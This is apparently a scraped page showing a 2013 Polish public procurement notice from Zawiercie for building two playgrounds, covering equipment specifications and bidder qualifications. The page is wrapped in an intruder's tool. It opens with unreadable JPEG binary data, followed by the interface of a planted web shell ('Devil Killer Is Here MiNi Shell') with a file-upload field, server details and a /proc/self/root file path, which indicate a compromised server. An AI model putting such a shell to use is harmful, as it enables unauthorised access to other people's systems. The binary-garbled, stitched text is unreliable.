JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/105155-N-2013.html

<p class="kh_header"><b>Zawiercie: Zaprojektowanie i wykonanie placu zabaw  przy ul. Kromołowskiej na działce nr 419/4 ( plac zabaw nr I ) i ul. 11 Listopada na działce nr 7 (plac zabaw nr II ) w ramach zadania pn.:
Budowa placów zabaw na terenie miasta Zawiercie.</b><br>
<b>Numer ogłoszenia: 105155 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie placu zabaw  przy ul. Kromołowskiej na działce nr 419/4 ( plac zabaw nr I ) i ul. 11 Listopada na działce nr 7 (plac zabaw nr II ) w ramach zadania pn.:
Budowa placów zabaw na terenie miasta Zawiercie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zaprojektowanie i wykonanie placu zabaw  przy ul. Kromołowskiej na działce nr 419/4  plac zabaw nr I)  i ul. 11 Listopada na działce nr 7 (plac zabaw nr II)  w  ramach zadania pn.: Budowa placów zabaw na terenie miasta Zawiercie.

1)Zakres prac projektowych obejmuje zaprojektowanie zagospodarowania placów zabaw   w szczególności: 
a)Wykonanie  projektu budowlano - wykonawczego w 5 egzemplarzach w wersji papierowej;
b)Wykonanie koncepcji programowo przestrzennej w 2 egzemplarzach w wersji papierowej;
c)Wykonanie zagospodarowania terenu w skali 1:500 w  5 egzemplarzach  w wersji papierowej;
d)Uwzględnienie w projekcie:
usytuowanie urządzeń aby każde z nich posiadało wymaganą przepisami strefę bezpieczeństwa,
bezpieczne podłoże w rejonie poszczególnych urządzeń,
ogrodzenia placów zabaw;
e)Inwentaryzację powykonawczą w 3 egz w wersji papierowej.

2)Zakres robót budowlanych obejmuje w szczególności:
a)Przygotowanie terenu pod budowę oraz wykonanie zagospodarowania placu zabaw; 
b)Powierzchnia zagospodarowania placu zabaw nr I ok.210 m2 w tym: nawierzchnia, na której zostanie zainstalowany sprzęt rekreacyjny -  ok. 150 m2, 
c)Powierzchnia zagospodarowania placu nr II około 152 m2  w tym: nawierzchnia, na której zostanie zainstalowany sprzęt rekreacyjny - ok. 106 m2 .

Podstawowe dane techniczne: 

I.Plac zabaw przy ulicy Kromołowskiej - nr działki 419/4
Urządzenia zabawowe wraz z poszczególnymi elementami składowymi muszą:
a)odpowiadać wszelkim normom wytrzymałościowym, posiadać certyfikaty bezpieczeństwa i atesty,
b)spełniać wymogi bezpieczeństwa i badań Polskiej Normy PN-EN-1176-(1-6),
c)posiadać karty techniczne.

Minimalne wyposażenie placu zabaw powinno zawierać:

1)Dostawę i montaż zestawu zabawowego -   szt.1

 W skład zestawu wchodzą następujące elementy:
1 x wieża sześciokątna zadaszona,
1 x wieża - niezadaszona,
1 x zjeżdżalnia spiralna,
1 x pomost wiszący linowy, 
1 x zjeżdżalnia, 
1 x wejście wspinaczkowe,
1 x rura strażacka,
1 x wejście linowe,
1 x kółko- krzyżyk,
1 x sklepik.

Charakterystyka urządzenia:
	 konstrukcja nośna z belek z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100mm, malowana farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	 konstrukcja dachu wykonana z rurek stalowych, wypełniona kolorowymi płytami HDPE trójwarstwowymi,
	 osłony boczne w formie barierek wykonanych z HDPE,
	 podesty, pomosty i tramp drewniany z desek impregnowanych, niemalowanych,
	 poręcze metalowe, zabezpieczone poprzez odtłuszczenie i cynkowanie kąpielowe, malowane proszkowo, 
	 poręcze na pomostach dodatkowo osłonięte panelem z ozdobnej, kolorowej płyty HDPE trójwarstwowej,
	 schody wykonane z konstrukcji drewnianej ,poręcz przy schodkach z rurek ocynkowanych i malowanych proszkowo,
	 zjeżdżalnia: ślizg z blachy nierdzewnej, boki HDPE,
	 łańcuch techniczny kalibrowany, ocynkowany kąpielowo, lub nierdzewny,
	 belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego,
	 stal zabezpieczona poprzez odtłuszczenie i cynkowana kąpielowo,
	 śruby ocynkowane, nakrętki schowane w gniazdach i zakryte plastikową zaślepką,
	 marki stalowe ocynkowane wykonane z blachy i rur.

2)	Dostawę i montaż huśtawki wagowej  -  szt.  1
Charakterystyka urządzenia:
	nogi konstrukcyjne z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100 mm, malowane farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	siedziska proste HDPE,
	elementy dekoracyjne płyta HDPE,
	wymagane zastosowanie ogólnych warunków technicznych.

3)	Dostawę i montaż huśtawki wagowej jednomiejscowej - szt. 1
Charakterystyka urządzenia:
	nogi konstrukcyjne z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100 mm, malowane farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	konstrukcja stężająca z rur stalowych ocynkowanych,  malowanych proszkowo,
	łożyska samosmarujące,
	element dekoracyjny z płyty HDPE trójwarstwowej (np. KONIK),
	siedzisko z płyty HDPE,
	belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego,
	jako zabezpieczenia dodatkowe rurki stalowe, do których zamocowany jest płaskownik,
	stal zabezpieczona poprzez odtłuszczenie i cynkowana kąpielowo,
	śruby ocynkowane, nakrętki schowane w gniazdach i zakryte plastikową zaślepką,
	marki stalowe ocynkowane wykonane z blachy i rur,
	wymagane zastosowanie ogólnych warunków technicznych.

4)	Dostawę i montaż piaskownicy z wypełnieniem  - szt. 1
Charakterystyka urządzenia:
	konstrukcja  z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100 mm, malowane farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	siedziska płyta HDPE.

5)	Dostawę i montaż ławki  drewnianej z oparciem -  szt. 2
Charakterystyka urządzenia:
	konstrukcja  metalowa montowana trwale do podłoża za pomocą kotew lub śrub do fundamentów betonowych.  Siedziska z drewna przytwierdzone do konstrukcji metalowej.

6)	Dostawę i montaż kosza drewnianego  na śmieci  -  szt. 1
Charakterystyka urządzenia:
	konstrukcja metalowa malowana proszkowo posadowiona w gruncie trwale zabetonowane. Kolor czarny.

7)	Dostawę i montaż regulaminu placu zabaw -  szt. 1
 Charakterystyka urządzenia:
	konstrukcja nośna z belek z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100mm, malowana farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	daszek płyta HDPE.

8)	Dostawę i montaż płotu metalowego panelowego - długość wg. projektu - 
około 60mb
	z drutu 5 mm - bez wystających końcówek o wymiarach około 500 x 1200, oczka 50x200. Malowane proszkowo kolor RAL do uzgodnienia. Słupki z profili 60x40x2 wraz z obejmami i akcesoriami - nierdzewne.
Podmurówka systemowa - płyty - 2300x200x50.

9)	Dostawę i montaż furtki metalowej panelowej systemowej - szt. 1
	panelowa systemowa z drutu 5 mm bez wystających końcówek o wymiarach około 1200x1200 z zamkiem i klamką zamontowane na słupkach z profili 60x40x2.

Sposób montażu urządzeń:
Montaż obejmuje następujące czynności:
	wykonanie korytowania na gł. 35 cm pod bezpieczne podłoże z odwozem nadmiaru 
	ułożenie na dnie wykopu geowłókniny i wypełnienie koryta piaskiem gr 30 cm,
	wykonanie wykopu pod fundament betonowy, wykonanie fundamentu z betonu klasy B20, osadzenie i przymocowanie urządzenia, ustawienie pionu i poziomu konstrukcji, wypełnienie pozostałej przestrzeni wykopu urobkiem pozostałym po wykopie, uporządkowanie terenu,
	 urządzenia muszą być tak zamontowane, aby każde z nich posiadało wymaganą przepisami strefę bezpieczeństwa,
wykonanie ogrodzenia placu zabaw.
 

II.	Plac zabaw przy ulicy 11 Listopada - nr działki 7
Urządzenia zabawowe wraz z poszczególnymi elementami składowymi muszą:
a)	odpowiadać wszelkim normom wytrzymałościowym, posiadać certyfikaty bezpieczeństwa i atesty,
b)	spełniać wymogi bezpieczeństwa i badań Polskiej Normy PN-EN-1176-(1-6),
c)	posiadać karty techniczne.

Minimalne wyposażenie placu zabaw powinno zawierać:

1)	Dostawę i montaż zestawu zabawowego -   szt.1
W skład zestawu wchodzą następujące elementy:
	2 x wieża czworokątna zadaszona,
	2 x wieża - niezadaszona,
	1 x pomost stały,
	1 x pomost wiszący, 
	2 x zjeżdżalnia, 
	1 x trap wejściowy,
	1 x schody z barierkami,
1 x drabinka wejściowa,
	5 x bariera.

Charakterystyka urządzenia:
	konstrukcja nośna z belek z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100mm, malowana farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	konstrukcja dachu wykonana z rurek stalowych, wypełniona kolorowymi płytami HDPE trójwarstwowymi,
	osłony boczne w formie barierek wykonanych z HDPE,
	podesty, pomosty i tramp drewniany z desek impregnowanych, niemalowanych,
	poręcze metalowe, zabezpieczone poprzez odtłuszczenie i cynkowanie kąpielowe, malowane proszkowo, 
	poręcze na pomostach dodatkowo osłonięte panelem z ozdobnej, kolorowej płyty HDPE trójwarstwowej,
schody wykonane z konstrukcji drewnianej, poręcz przy schodkach z rurek ocynkowanych i malowanych proszkowo,
	zjeżdżalnia: ślizg z blachy nierdzewnej, 
	łańcuch techniczny kalibrowany, ocynkowany kąpielowo, lub nierdzewny,
	belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego,
	stal zabezpieczona poprzez odtłuszczenie i cynkowana kąpielowo,
	śruby ocynkowane, nakrętki schowane w gniazdach i zakryte plastikową zaślepką,
	marki stalowe ocynkowane wykonane z blachy i rur.

2)	Dostawę i montaż huśtawki wahadłowej -  szt.  1

Charakterystyka urządzenia:
	nogi konstrukcyjne z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100 mm, malowane farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
belka wykonana z profilu zamkniętego stalowego, ocynkowanego, malowanego proszkowo,
	siedziska proste -  zawieszone na zawiesiach  łożyskowych, 
	 łańcuch techniczny kalibrowany, ocynkowany kąpielowo, lub nierdzewny,
	stal zabezpieczona poprzez odtłuszczenie i cynkowanie kąpielowe, 
śruby ocynkowane, nakrętki schowane w gniazdach i zakryte plastikową zaślepką,
wymagane zastosowanie ogólnych warunków technicznych.

3)	Dostawę i montaż huśtawki wagowej jednomiejscowej - szt. 1
Charakterystyka urządzenia:
nogi konstrukcyjne z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100 mm, malowane farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
konstrukcja stężająca z rur stalowych ocynkowanych,  malowanych proszkowo,
łożyska samosmarujące,
element dekoracyjny z płyty HDPE trójwarstwowej (np. KONIK) 
siedzisko z płyty HDPE,
belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego,
jako zabezpieczenia dodatkowe rurki stalowe, do których zamocowany jest płaskownik,
stal zabezpieczona poprzez odtłuszczenie i cynkowana kąpielowo,
śruby ocynkowane, nakrętki schowane w gniazdach i zakryte plastikową zaślepką
marki stalowe ocynkowane wykonane z blachy i rur,
wymagane zastosowanie ogólnych warunków technicznych.

4)	Dostawę i montaż równoważni potrójnej - szt. 1
Charakterystyka urządzenia:
konstrukcja  z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100 mm, malowane farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym

5)	Dostawę i montaż zestawu sprawnościowego - szt. 1
Charakterystyka urządzenia:
	konstrukcja nośna z belek z drewna sosnowego, klejonego trójwarstwowo o przekroju 90-100/90-100mm, malowana farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,

W skład zestawu wchodzą :
	2 x skoczek,
	1 x równoważnia prosta,
1 x ścianka wspinaczkowa z krążkami.

6)	Dostawę i montaż ławki stalowej skośnej -  szt. 3

Charakterystyka urządzenia :
	siedziska płyta HDPE,
	konstrukcja stalowa ocynkowana montowana trwale do podłoża za pomocą śrub lub kotew do fundamentów betonowych.

7)	Dostawę i montaż kosza stalowego na śmieci  -  szt. 2
Charakterystyka urządzenia :
	konstrukcja stalowa, malowana proszkowo,
	urządzenie na stałe posadowione w gruncie trwale zabetonowane. 

8)	Dostawę i montaż regulaminu placu zabaw -  szt. 1
 Charakterystyka urządzenia :
	konstrukcja nośna z belek z drewna sosnowego, klejonego trójwarstwowo o przekroju 
90-100/90-100mm, malowana farbami impregnacyjno-dekoracyjnymi w kolorze ciemnobrązowym,
	daszek płyta HDPE.

9)	Dostawę i montaż płotu metalowego panelowego - długość wg projektu 
około 60mb:
 z drutu 5 mm - bez wystających końcówek o wymiarach około 2500 x1200 mm, oczka 50x200. Malowane proszkowo kolor RAL. Słupki z profili 60x40x2 wraz z obejmami i akcesoriami  - nierdzewne.
	 Podmurówka systemowa - płyty 2300x200x50
  
10)	Dostawę i montaż furtki metalowej panelowej - szt. 1

	panelowa systemowa z drutu 5 mm bez wystających końcówek o wymiarach około 1200x1200 z zamkiem i klamką zamontowane na słupkach z profili 60x40x2.

Sposób montażu urządzeń:
Montaż obejmuje następujące czynności:
	 wykonanie korytowania na gł. 35 cm pod bezpieczne podłoże z odwozem ziemi,
 ułożenie na dnie wykopu geowłókniny i wypełnienie koryta piaskiem gr. 30 cm,
	 wykonanie wykopu pod fundament betonowy, wykonanie fundamentu z betonu klasy B20, osadzenie i przymocowanie urządzenia, ustawienie pionu i poziomu konstrukcji, wypełnienie pozostałej  przestrzeni wykopu urobkiem pozostałym po wykopie, uporządkowanie terenu,
	 urządzenia muszą być tak zamontowane, aby każde z nich posiadało wymaganą przepisami strefę bezpieczeństwa,
	 wykonanie ogrodzenia placu zabaw.
 
Szczegółowy opis przedmiotu zamówienia zawiera ponadto Program Funkcjonalno - Użytkowy (PFU), który stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia (dalej siwz).

Wykonawca obowiązany jest do udzielenia 36-miesięcznej gwarancji oraz 36-miesięcznej rękojmi na wykonany przedmiot zamówienia.

Tam, gdzie ewentualnie w Programie Funkcjonalno - Użytkowym  (PFU) zostały wskazane znak towarowy, patent, pochodzenie lub normy, aprobaty, specyfikacje techniczne i systemy odniesienia, o których mowa w art. 30 ust. 1-3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 71.32.00.00-7, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej jedną robotę  budowlaną polegającą na wykonaniu placu zabaw obejmującą montaż urządzeń zabawowych o wartości nie mniejszej niż 40.000,00 zł  brutto. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ) oraz 
 wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania (zgodnie z załącznikiem nr 2 do SIWZ) oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wykaz i dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone należy ograniczyć wyłącznie do robót budowlanych potwierdzających spełnienie warunku w zakresie wiedzy i doświadczenia opisanego w SIWZ. Dowodami, o których mowa powyżej mogą być:- poświadczenia,- inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Wykonawca, w miejsce poświadczeń, o których mowa powyżej, może przedkładać dokumenty potwierdzające wykonanie robót budowlanych w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, o którym mowa w ppkt 2), zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców.
W sytuacji gdy w zamówieniach przedstawionych przez Wykonawcę (na potwierdzenie spełniania warunku) rozliczenie między Wykonawcą a zamawiającym za wykonane zamówienia zostało dokonane w innej walucie niż w złotych polskich, Wykonawca (dla celów oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż w złotych polskich na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż dysponuje lub będzie dysponował osobą lub osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi:a)uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów,b)uprawnienia budowlane do projektowania w specjalności architektonicznej lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zamawiający, określając wymogi  w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz.U. z 2010 r., nr 243, poz. 1623) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. nr 63, poz. 394). Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ) oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z  oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wskazane przez Wykonawcę w wykazie osób)  posiadają wymagane uprawnienia (załącznik nr 3 do SIWZ).
W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
